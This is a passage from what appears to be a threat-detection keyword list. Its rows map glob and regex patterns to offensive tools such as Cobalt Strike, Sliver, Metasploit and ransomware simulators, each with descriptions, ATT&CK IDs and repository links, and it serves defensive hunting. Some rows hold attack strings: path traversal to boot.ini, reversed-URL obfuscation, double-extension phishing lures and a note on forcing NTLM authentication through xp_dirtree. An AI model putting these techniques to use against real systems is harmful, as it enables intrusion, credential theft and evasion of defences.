T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.villain_core*",".{0,1000}\.villain_core.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*.vpn.123456.*",".{0,1000}\.vpn\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.webmail.123456.*",".{0,1000}\.webmail\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.wiki.123456.*",".{0,1000}\.wiki\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.win10.config.fireeye*",".{0,1000}\.win10\.config\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*.win7.config.fireeye*",".{0,1000}\.win7\.config\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*.WriteLine(""SharpRDP"")*",".{0,1000}\.WriteLine\(\""SharpRDP\""\).{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.xls.bat*",".{0,1000}\.xls\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*.xls.dll*",".{0,1000}\.xls\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.exe*",".{0,1000}\.xls\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.htm*",".{0,1000}\.xls\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.iso*",".{0,1000}\.xls\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.jar*",".{0,1000}\.xls\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.js*",".{0,1000}\.xls\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.sfx*",".{0,1000}\.xls\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.vbs*",".{0,1000}\.xls\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*.xlsx.bat*",".{0,1000}\.xlsx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.dll*",".{0,1000}\.xlsx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.exe*",".{0,1000}\.xlsx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.htm*",".{0,1000}\.xlsx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.iso*",".{0,1000}\.xlsx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.jar*",".{0,1000}\.xlsx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.jasmin*",".{0,1000}\.xlsx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.xlsx.js*",".{0,1000}\.xlsx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious 
extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.sfx*",".{0,1000}\.xlsx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.vbs*",".{0,1000}\.xlsx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xp_dirtree *\*",".{0,1000}\.xp_dirtree\s.{0,1000}\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.zip.exe*",".{0,1000}\.zip\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.zip.iso*",".{0,1000}\.zip\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/#kali-installer-images*",".{0,1000}\/\#kali\-installer\-images.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an 
open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/*_priv_esc.*",".{0,1000}\/.{0,1000}_priv_esc\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/*SandboxEscapes/*",".{0,1000}\/.{0,1000}SandboxEscapes\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/../../../../../boot.ini*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/boot\.ini.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/.aggressor.prop*",".{0,1000}\/\.aggressor\.prop.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/.clone.dll*",".{0,1000}\/\.clone\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/.cme/cme.conf*",".{0,1000}\/\.cme\/cme\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/.dns2tcprc*",".{0,1000}\/\.dns2tcprc.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/.exegol/*",".{0,1000}\/\.exegol\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/.link/3rdparty/SharpCollection*",".{0,1000}\/\.link\/3rdparty\/SharpCollection.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*/.local/share/pacu/*",".{0,1000}\/\.local\/share\/pacu\/.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/.localxpose/.access*",".{0,1000}\/\.localxpose\/\.access.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/.manspider/logs*",".{0,1000}\/\.manspider\/logs.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/.manspider/loot*",".{0,1000}\/\.manspider\/loot.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/.MOONWALK*",".{0,1000}\/\.MOONWALK.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*/.msf4/*",".{0,1000}\/\.msf4\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - 
T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/.ntdissector*",".{0,1000}\/\.ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*/.nxc/obfuscated_scripts/*",".{0,1000}\/\.nxc\/obfuscated_scripts\/.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/.proxychains/*",".{0,1000}\/\.proxychains\/.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*/.sliver/logs*",".{0,1000}\/\.sliver\/logs.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/.sliver-client/*",".{0,1000}\/\.sliver\-client\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/.ssh/RAI.pub*",".{0,1000}\/\.ssh\/RAI\.pub.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*// A: the Meterpreter stage is a large shellcode 
*",".{0,1000}\/\/\sA\:\sthe\sMeterpreter\sstage\sis\sa\slarge\sshellcode\s.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*// Define IP Adress of your C2 Stager (!)*",".{0,1000}\/\/\sDefine\sIP\sAdress\sof\syour\sC2\sStager\s\(!\).{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*// Malicious payload should be implemented here*",".{0,1000}\/\/\sMalicious\spayload\sshould\sbe\simplemented\shere.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*//:ptth*",".{0,1000}\/\/\:ptth.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed http://","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*//:sptth""[::-1]*",".{0,1000}\/\/\:sptth\""\[\:\:\-1\].{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense 
